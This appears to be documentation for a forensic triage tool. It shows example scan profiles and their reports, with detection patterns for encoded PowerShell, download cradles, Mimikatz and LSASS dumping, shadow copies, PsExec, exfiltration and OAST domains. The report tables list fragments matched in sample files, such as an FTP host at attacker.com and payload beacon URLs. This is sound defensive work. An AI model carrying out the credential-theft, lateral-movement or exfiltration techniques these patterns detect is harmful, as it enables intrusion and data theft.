[[patterns]]
  name = "Failed Logon 4625"
  pattern = "4625"
  type = "string"

[[patterns]]
  name = "Account Lockout 4740"
  pattern = "4740"
  type = "string"

[[patterns]]
  name = "New Process 4688"
  pattern = "4688"
  type = "string"

[[patterns]]
  name = "Scheduled Task 4698"
  pattern = "4698"
  type = "string"

# PowerShell logging
[[patterns]]
  name = "PowerShell Event"
  pattern = "Microsoft-Windows-PowerShell"
  type = "string"
  case-insensitive = true

[[patterns]]
  name = "Script Block"
  pattern = "ScriptBlockText"
  type = "string"

# Suspicious commands in events
[[patterns]]
  name = "Encoded Command"
  pattern = "-encodedcommand|-enc"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Download Cradle"
  pattern = "DownloadString|Invoke-WebRequest|IEX"
  type = "regex"
  case-insensitive = true

# Sysmon events
[[patterns]]
  name = "Process Create (Sysmon 1)"
  pattern = "EventID.*1.*ProcessCreate"
  type = "regex"

[[patterns]]
  name = "Network Connection (Sysmon 3)"
  pattern = "EventID.*3.*NetworkConnect"
  type = "regex"

# EVTX file header pattern (hex for "ElfFile")
[[patterns]]
  name = "EVTX Header"
  pattern = "45:6C:66:46:69:6C:65"
  type = "bytes"

Report outputs

Triage report (converted from triage_report.json)

total_files	2
critical_count	0
high_count	0
medium_count	0
low_count	1
minimal_count	1
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.307018600+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	EventLog	35	False	/sample_security.evtx	5	1	0	["High-value artifact type: Event Log", "1 suspicious patterns detected"]	Low	40	81154e8ee0307f4d2865da14957e6b6928dd89b51e1985840d166948481ac136
0	Other	0	False	/event_logs.txt	15	11	11	["11 suspicious patterns detected"]	Minimal	26	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/event_logs.txt	event_logs.txt	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T09:19:34.645985218Z	["text/plain"]	0	0	0	0
/sample_security.evtx	sample_security.evtx	81154e8ee0307f4d2865da14957e6b6928dd89b51e1985840d166948481ac136	2025-12-03T09:16:08.041585051Z	2025-12-03T09:16:08.041585051Z	2025-12-03T09:19:34.644985217Z	[]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	81154e8ee0307f4d2865da14957e6b6928dd89b51e1985840d166948481ac136	EVTX Header	bytes	ElfFile	0	7
2	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Encoded Command	regex	-encodedcommand	46:17	15
3	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Download Cradle	regex	Invoke-WebRequest	45:2	17
4	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Download Cradle	regex	IEX	45:57	3
5	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Logon Event 4624	string	4624	5:10	4
6	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Failed Logon 4625	string	4625	12:10	4
7	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Failed Logon 4625	string	4625	19:10	4
8	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Account Lockout 4740	string	4740	25:10	4
9	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	New Process 4688	string	4688	30:10	4
10	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Scheduled Task 4698	string	4698	36:10	4
11	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	Script Block	string	ScriptBlockText	43:1	15
12	95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	PowerShell Event	string	Microsoft-Windows-PowerShell	42:9	28

signature_matches.csv

Empty CSV

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
95def1ae00f1f2aa96662fe9bf5082456259f378e436b7f9a57f996abba9ab8b	1525a63af21b321526717c020ea814cad7afbe04	f17445a5491a3e777d7bc9ce1d80c644	1334	text/plain	5.34833938232107
81154e8ee0307f4d2865da14957e6b6928dd89b51e1985840d166948481ac136	c59f06b8df6ff692114b8b80a1a0164e7ee3dc9e	b37b49735487f1ecfb9713839aeaf903	69632	application/octet-stream	0.0063210226671861

Example: incident-response

Inputs

examples/inputs/incident-response-samples/credential_access.txt
examples/inputs/incident-response-samples/data_exfiltration.txt
examples/inputs/incident-response-samples/lateral_movement.txt
examples/inputs/incident-response-samples/persistence_indicators.sh

Profile

# Incident Response Profile
# Profile for incident response and forensic analysis

decode = ["base64", "hex", "percent-encoding", "unicode-escape-sequences"]

max-file-size = 104857600  # 100 MiB

include-path-globs = []
exclude-path-globs = []

tag = "incident-response"

# C2 Communication Indicators
[[patterns]]
  name = "URL Pattern"
  pattern = "https?://((\\w+)|((\\d+\\.){3}\\d+))(:\\d+)?/\\S+"
  type = "regex"

[[patterns]]
  name = "IP Address"
  pattern = "\\b(?:\\d{1,3}\\.){3}\\d{1,3}\\b"
  type = "regex"

[[patterns]]
  name = "Domain with Port"
  pattern = "[a-zA-Z0-9][-a-zA-Z0-9]*\\.[a-zA-Z]{2,}:\\d+"
  type = "regex"

# Persistence Mechanisms
[[patterns]]
  name = "Cron Entry"
  pattern = "^\\s*(\\*|\\d+)\\s+(\\*|\\d+)\\s+(\\*|\\d+)\\s+(\\*|\\d+)\\s+(\\*|\\d+)\\s+"
  type = "regex"

[[patterns]]
  name = "Registry Run Key"
  pattern = "Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Scheduled Task"
  pattern = "schtasks\\s+/create"
  type = "regex"
  case-insensitive = true

# Lateral Movement
[[patterns]]
  name = "PsExec Usage"
  pattern = "psexec\\s+(\\\\\\\\)?[\\w.-]+"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "WMI Command"
  pattern = "wmic\\s+/node:"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "SSH Command"
  pattern = "ssh\\s+(-[\\w]+\\s+)*[\\w@.-]+"
  type = "regex"

# Data Exfiltration
[[patterns]]
  name = "Large Data Copy"
  pattern = "(xcopy|robocopy|tar\\s+cf|zip\\s+-r)"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "FTP Command"
  pattern = "ftp\\s+[\\w.-]+"
  type = "regex"

[[patterns]]
  name = "Cloud Upload"
  pattern = "(aws\\s+s3\\s+cp|gsutil\\s+cp|azcopy)"
  type = "regex"

# Credential Access
[[patterns]]
  name = "Mimikatz"
  pattern = "mimikatz|sekurlsa::logonpasswords"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "LSASS Dump"
  pattern = "lsass\\.dmp|lsass\\.exe"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Shadow Copy"
  pattern = "vssadmin.*shadows|ntdsutil.*snapshot"
  type = "regex"
  case-insensitive = true

# Encoding and Obfuscation
[[patterns]]
  name = "Base64 Decode"
  pattern = "base64\\s+-d|FromBase64String|atob\\("
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Certutil Download"
  pattern = "certutil.*-urlcache.*-split"
  type = "regex"
  case-insensitive = true

# Known Bad Indicators
[[patterns]]
  name = "OAST Domain"
  pattern = "(\\w+\\.)+(oast\\.me|burpcollaborator\\.net|interact\\.sh)"
  type = "regex"

[[patterns]]
  name = "Pastebin/Hastebin"
  pattern = "(pastebin\\.com|hastebin\\.com|paste\\.ee)/raw/"
  type = "regex"

# Signatures
[[signatures]]
  name = "High Entropy Files"
  query = "SELECT sha256 FROM unique_files WHERE shannon_entropy > 7.0"

[[signatures]]
  name = "Files with Network and Encoding Indicators"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name = 'URL Pattern' AND sha256 IN (SELECT sha256 FROM pattern_matches WHERE pattern_name = 'Base64 Decode')"

[[signatures]]
  name = "Files with Persistence and C2"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as indicator_count FROM pattern_matches WHERE pattern_name IN ('Registry Run Key', 'Cron Entry', 'Scheduled Task', 'URL Pattern', 'IP Address') GROUP BY sha256 HAVING indicator_count > 2"

Report outputs

Triage report (converted from triage_report.json)

total_files	6
critical_count	0
high_count	0
medium_count	0
low_count	1
minimal_count	5
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:43.851413371+00:00

top_scores

file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
Script	20	False	/persistence_indicators.sh	15	12	12	["12 suspicious patterns detected"]	Low	47	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51
Other	0	False	/lateral_movement.txt	15	17	14	["17 suspicious patterns detected"]	Minimal	29	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9
Other	0	False	/credential_access.txt/credential_access.txt.unicode-escape-sequences	15	17	14	["17 suspicious patterns detected"]	Minimal	29	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e
Other	0	False	/credential_access.txt	15	17	14	["17 suspicious patterns detected"]	Minimal	29	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129
Other	0	False	/data_exfiltration.txt	15	14	13	["14 suspicious patterns detected"]	Minimal	28	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81
Other	0	False	/persistence_indicators.sh/persistence_indicators.sh.unicode-escape-sequences	10	10	11	["10 suspicious patterns detected"]	Minimal	21	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_decoded_file
/lateral_movement.txt	lateral_movement.txt	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["text/plain"]	0
/data_exfiltration.txt	data_exfiltration.txt	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["text/plain"]	0
/persistence_indicators.sh/persistence_indicators.sh.unicode-escape-sequences	persistence_indicators.sh.unicode-escape-sequences	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728				[]	1
/persistence_indicators.sh	persistence_indicators.sh	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	["text/x-shellscript"]	0
/credential_access.txt/credential_access.txt.unicode-escape-sequences	credential_access.txt.unicode-escape-sequences	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e				[]	1
/credential_access.txt	credential_access.txt	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	2025-12-03T08:56:20.495889189Z	["text/plain"]	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	192.168.1.100	5:9	13
2	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	192.168.1.50	10:11	12
3	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	192.168.1.1	15:9	11
4	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	10.0.0.5	17:10	8
5	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	192.168.1.100	20:9	13
6	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	10.0.0.1	21:9	8
7	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	IP Address	regex	192.168.1.100	24:33	13
8	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	PsExec Usage	regex	PsExec patterns	4:2	15
9	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	PsExec Usage	regex	psexec \\192.168.1.100	5:0	22
10	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	PsExec Usage	regex	psexec \\fileserver	6:0	19
11	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	PsExec Usage	regex	psexec \\dc01.domain.local	7:0	26
12	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	WMI Command	regex	wmic /node:	10:0	11
13	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	WMI Command	regex	wmic /node:	11:0	11
14	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	WMI Command	regex	wmic /node:	12:0	11
15	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	SSH Command	regex	ssh root@192.168.1.1	15:0	20
16	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	SSH Command	regex	ssh -i	16:0	6
17	77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	SSH Command	regex	ssh admin@10.0.0.5	17:0	18
18	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Large Data Copy	regex	xcopy	5:0	5
19	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Large Data Copy	regex	robocopy	6:0	8
20	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Large Data Copy	regex	tar cf	7:0	6
21	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Large Data Copy	regex	zip -r	8:0	6
22	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	FTP Command	regex	ftp ftp.attacker.com	17:0	20
23	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Cloud Upload	regex	aws s3 cp	11:0	9
24	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Cloud Upload	regex	aws s3 cp	12:0	9
25	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Cloud Upload	regex	gsutil cp	13:0	9
26	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Cloud Upload	regex	azcopy	14:0	6
27	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Base64 Decode	regex	base64 -d	22:0	9
28	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Base64 Decode	regex	FromBase64String	23:29	16
29	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Base64 Decode	regex	base64 -d	24:17	9
30	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Base64 Decode	regex	atob(	25:0	5
31	f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	Certutil Download	regex	certutil -urlcache -split	28:0	25
32	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	URL Pattern	regex	http://192.168.1.100:8080/beacon	6:5	32
33	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	URL Pattern	regex	http://10.0.0.1:4444/payload	7:5	28
34	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	IP Address	regex	192.168.1.100	6:12	13
35	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	IP Address	regex	10.0.0.1	7:12	8
36	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	IP Address	regex	172.16.0.1	8:16	10
37	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	Domain with Port	regex	example.com:443	11:30	15
38	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	Domain with Port	regex	domain.com:8080	12:17	15
39	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	Domain with Port	regex	malware.org:443	15:23	15
40	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	Domain with Port	regex	attacker.net:8080	16:26	17
41	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	Scheduled Task	regex	schtasks /create	29:0	16
42	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	URL Pattern	regex	http://192.168.1.100:8080/beacon	6:5	32
43	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	URL Pattern	regex	http://10.0.0.1:4444/payload	7:5	28
44	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	IP Address	regex	192.168.1.100	6:12	13
45	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	IP Address	regex	10.0.0.1	7:12	8
46	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	IP Address	regex	172.16.0.1	8:16	10
47	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Domain with Port	regex	example.com:443	11:30	15
48	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Domain with Port	regex	domain.com:8080	12:17	15
49	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Domain with Port	regex	malware.org:443	15:23	15
50	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Domain with Port	regex	attacker.net:8080	16:26	17
51	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Registry Run Key	regex	Software\Microsoft\Windows\CurrentVersion\Run	25:9	45
52	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Registry Run Key	regex	Software\Microsoft\Windows\CurrentVersion\Run	26:5	45
53	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	Scheduled Task	regex	schtasks /create	29:0	16
54	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Mimikatz	regex	Mimikatz	4:2	8
55	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Mimikatz	regex	mimikatz	5:0	8
56	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Mimikatz	regex	mimikatz	6:0	8
57	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Mimikatz	regex	sekurlsa::logonpasswords	7:0	24
58	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	LSASS Dump	regex	lsass.exe	12:13	9
59	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	LSASS Dump	regex	lsass.dmp	12:23	9
60	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	LSASS Dump	regex	lsass.exe	13:34	9
61	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	LSASS Dump	regex	lsass.dmp	13:44	9
62	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	LSASS Dump	regex	lsass.exe	14:19	9
63	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Shadow Copy	regex	vssadmin list shadows	18:0	21
64	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Shadow Copy	regex	ntdsutil snapshot	21:0	17
65	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	OAST Domain	regex	uniqueid.oast.me	24:13	16
66	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	OAST Domain	regex	callback.burpcollaborator.net	25:9	29
67	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	OAST Domain	regex	test123.interact.sh	26:5	19
68	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Pastebin/Hastebin	regex	pastebin.com/raw/	29:13	17
69	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Pastebin/Hastebin	regex	hastebin.com/raw/	30:13	17
70	9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	Pastebin/Hastebin	regex	paste.ee/raw/	31:13	13
71	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Mimikatz	regex	Mimikatz	4:2	8
72	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Mimikatz	regex	mimikatz	5:0	8
73	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Mimikatz	regex	mimikatz	6:0	8
74	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Mimikatz	regex	sekurlsa::logonpasswords	7:0	24
75	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	LSASS Dump	regex	lsass.exe	12:13	9
76	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	LSASS Dump	regex	lsass.dmp	12:23	9
77	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	LSASS Dump	regex	lsass.exe	13:34	9
78	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	LSASS Dump	regex	lsass.dmp	13:44	9
79	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	LSASS Dump	regex	lsass.exe	14:19	9
80	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Shadow Copy	regex	vssadmin list shadows	18:0	21
81	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Shadow Copy	regex	ntdsutil snapshot	21:0	17
82	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	OAST Domain	regex	uniqueid.oast.me	24:13	16
83	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	OAST Domain	regex	callback.burpcollaborator.net	25:9	29
84	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	OAST Domain	regex	test123.interact.sh	26:5	19
85	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Pastebin/Hastebin	regex	pastebin.com/raw/	29:13	17
86	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Pastebin/Hastebin	regex	hastebin.com/raw/	30:13	17
87	7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	Pastebin/Hastebin	regex	paste.ee/raw/	31:13	13

signature_matches.csv

id	signature_name	sha256
1	Files with Persistence and C2	14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728
2	Files with Persistence and C2	2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51

unique_files.csv

sha256	sha1	md5	file_size	mime_type_for_content	shannon_entropy
77c31b59fca0dfabbec4e1a539fff381ff2f7a1b02d5fa5910b7a2029dde44f9	34a0bcdaccd429c7aba12beb6e605b39fcf2d8c0	0339227d5e12cb2537140b89289147ec	827	text/plain	5.08565263168859
f640a3db6d1cf9c2344ec7eb8dd1bc1468f0a01778046439c26adfcfe6fafa81	cfb06547898ef427402f9ad1dbf7eac830cde4ff	03ab0151439a393d703300ecd80f23a7	991	text/plain	5.19946251680103
14fa97f55252ce4a4d29ac509fb831bc7bf5fc72c38774d7adad704a6df96728	cc745426d0145aaaf0650c3f0e6a89ad3668947a	8100cb646d5b23278a53a4df6029ec85	1027	text/x-shellscript	5.21059999015889
2bbf8049420f6fa9aaca4d2a555847fe6629060a462d562d45a3ad500c4adc51	9b59ccf2e4662a228d3688f209c1216fc1bf41ed	b5e907e5d4704e5006bdfbfbaeaae804	1041	text/x-shellscript	5.24339777508192
9594b8608605933c88923a608d129720f305d12223df224937d1bfad81c8677e	d48a61d79dc8570bdc20d2c76d37ec8775902ec0	ae50451a2dc69467e533d67efc7735c2	944	text/plain	5.07353039059472
7e7eca3c8e6b17d20e3eeb96536ff5720faa80b2bd79e3c7abf3701f2fa3e129	7c891f5e60afb2261836013167d6cb53526a48bc	7132c4a0055086a0f5270c66c1d03315	951	text/plain	5.09169093686567

Example: kape-target

Inputs

examples/inputs/kape-target-samples/browser_artifacts.txt

Profile

# KAPE Target Example
# This example demonstrates using KAPE-style forensic collection profiles
# Uses includes to combine multiple base profiles similar to KAPE targets

# Include base profiles to provide comprehensive forensic coverage
# These profiles include patterns for malware, credentials, and network artifacts
includes = [
  "../../profiles/base/malware.toml",
  "../../profiles/base/credentials.toml",
  "../../profiles/base/network.toml",
  "../../profiles/base/forensics.toml"
]

decode = ["base64"]

tag = "kape-target"

# Additional browser artifact patterns to complement the base profiles
[[patterns]]
  name = "Browser History URL"
  pattern = "https?://[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}"
  type = "regex"

[[patterns]]
  name = "Cookie Data"
  pattern = "cookie|session_id|auth_token"
  type = "regex"
  case-insensitive = true

# Windows execution artifacts
[[patterns]]
  name = "Prefetch Reference"
  pattern = "\\.pf$"
  type = "regex"

[[patterns]]
  name = "LNK File"
  pattern = "\\.lnk$"
  type = "regex"

# Registry artifact patterns  
[[patterns]]
  name = "Registry Hive"
  pattern = "NTUSER\\.DAT|SAM|SECURITY|SOFTWARE|SYSTEM"
  type = "regex"
  case-insensitive = true

[[patterns]]
  name = "Run Key"
  pattern = "CurrentVersion\\\\Run"
  type = "regex"
  case-insensitive = true

# Signatures for triage
[[signatures]]
  name = "High Value Artifacts"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Registry Hive', 'Prefetch Reference', 'LNK File', 'Browser History URL')"

[[signatures]]
  name = "Multiple Indicators"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as indicator_count FROM pattern_matches GROUP BY sha256 HAVING indicator_count > 3"

Report outputs

Triage report (converted from triage_report.json)

total_files	1
critical_count	0
high_count	0
medium_count	0
low_count	1
minimal_count	0
must_investigate_count	0
all_scores	None
generated_at	2025-12-03T09:19:44.191952511+00:00

top_scores

characteristics_score	file_type	file_type_score	must_investigate	path	pattern_count_score	pattern_matches	pattern_severity_score	reasons	risk_level	score	sha256
0	Other	0	False	/browser_artifacts.txt	20	26	16	["26 suspicious patterns detected"]	Low	36	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b

path	file_name	sha256	file_created	file_modified	file_accessed	mime_types_from_file_extension	is_symbolic_link	is_extracted_file	is_decoded_file	is_deobfuscated_file	tag
/browser_artifacts.txt	browser_artifacts.txt	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	2025-12-03T08:56:20.496889204Z	2025-12-03T08:56:20.496889204Z	2025-12-03T09:19:17.543962359Z	["text/plain"]	0	0	0	0

pattern_matches.csv

id	sha256	pattern_name	match_type	match	location	length
1	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Suspicious Registry Autorun	regex	HKCU\Software\Microsoft\Windows\CurrentVersion\Run	21:0	50
2	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	HTTP URL	regex	https://example.com/login	5:5	25
3	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	HTTP URL	regex	https://mail.google.com/	6:5	24
4	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	HTTP URL	regex	https://github.com/user/repo	7:5	28
5	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	HTTP URL	regex	http://suspicious-site.example.com/download	8:5	43
6	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	Sam	1:2	3
7	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	Software	21:5	8
8	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	NTUSER.DAT	22:0	10
9	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Registry Hive	regex	SAM	23:0	3
10	02b7836931f1b41384a04ceea08bb913daf5b95779493223c86c06d0923bc84b	Browser History	regex	history	1:17	7
